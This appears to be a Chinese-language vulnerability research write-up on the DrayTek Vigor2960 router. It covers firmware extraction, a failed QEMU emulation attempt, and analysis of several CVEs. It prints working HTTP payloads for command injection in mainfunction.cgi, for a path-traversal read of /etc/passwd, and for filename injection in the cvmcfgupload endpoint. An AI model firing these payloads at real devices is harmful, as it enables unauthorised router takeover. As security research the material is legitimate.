某路由器RCE漏洞分析

下载地址

• https://fw.draytek.com.tw/Vigor2960/Firmware/

使用手册

• https://support.formosa.no/DrayTek/Downloads/Vigor2960/Manual/Vigor2960%20%E7%B3%BB%E5%88%97%E4%BD%BF%E7%94%A8%E6%89%8B%E5%86%8A%20V2.1.pdf

厂商漏洞列表

• https://www.draytek.com/about/security-advisory

架构

根据漏洞通告表述为MIPS架构，可通过qemu的system模式搭建模拟系统实际bin下执行文件镜像为arm小端elf文件，拿到shell上传工具需注意平台文件格斯

环境搭建失败

尝试搭建环境但是失败

UBI文件格式镜像打包文件

 ubireader_extract_images Vigor2960_v1.4.1.all  

解包释放镜像

ubireader_extract_files Vigor2960_v1.4.1.all

解包释放文件

#配置网络，创建网桥
sudo apt-get install bridge-utils
sudo brctl addbr Virbr0
sudo ifconfig Virbr0 192.168.10.1/24 up
 
#创建tap接口，添加到网桥
sudo apt install uml-utilities
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.10.11/24 up
sudo brctl addif Virbr0 tap


sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic

#进入虚拟机后，配置ip地址，测试与主机的连通性
ifconfig eth0 192.168.10.2/24 up
ping 192.168.10.1 -c 10
 
#回到主机中将squashfs-root文件夹复制到虚拟机
scp -r ubifs-root/ [email protected]:~/

mount -o bind /dev ./ubifs-root/dev
mount -o bind /proc ./ubifs-root/proc

ssh [email protected]
chroot squashfs-root /bin/sh
接着启动web服务成功，但未找到vpn全部启动脚本，仅搭建http服务没有任何意义

漏洞

最新版本漏洞，疑似CVE-2023-24229

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 192.168.1.1
Content-Length: 57
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: SESSION_ID_VIGOR=
Connection: close

action=commandTable&command=14&parameter=`touch test.txt`

最新版本漏洞，CVE-2023-1009

v1.5.1.4

根据poc直接在action中找方法

对value写入v6缓冲区和/tmp/拼接未对字符串进行任何处理，任意文件读取

sub_11B88为向keyword_object.cfg写配置，我们不进入循环，意义不大

https://github.com/xxy1126/Vuln/blob/main/Draytek/1.md

POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: xxxxxxxx
Content-Length: 61
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: xxxxxxxx
Referer: xxxxxxxxxx
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
Connection: close

action=doCfgExport&option=/../etc/passwd-&rtick=1663484341535

CVE-2020-8515

version<1.5.1

漏洞复现 DrayTek Vigor 路由器远程命令执行漏洞

https://www.secpulse.com/archives/166775.html

https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/

反编译main函数，找到action参数的处理函数

跟进subB3E0

对照off_41408

过check函数然后v40和openssl拼接

popen执行命令

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-14472

version<1.5.1.1

https://nosec.org/home/detail/4631.html

https://bestwing.me/drayteck-vigor-vulnerability-disclosure.html

https://github.com/Cossack9989/Vulns/blob/d9f9fad0e967859cc119a9d3c31e90adc17c655f/IoT/CVE-2020-14472.md?plain=1#L4

CVE-2020-15415

在1.5.1版本下，当访问cgi-bin/mainfunction.cgi/cvmcfgupload这个路径时，如果content type为text/x-python-script，则在filename中存在命令注入。

跟进sub_12F24

命令拼接触发点如下

POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 174
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en;q=0.9,zh-CN;q=0.8,la;q=0.7
Connection: close

------WebKitFormBoundary`

Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_"`

Content-Type: text/x-python-script`

------WebKitFormBoundary--`

[无真实poc]CVE-2020-19664

https://github.com/peanuts62/bug_poc

[无poc]CNVD-2021-28718

DrayTek Vigor2960 1.5.1.2

[无poc]CNVD-2021-28719

DrayTek Vigor2960 1.5.1.2

[无poc]CVE-2021-43118

- END -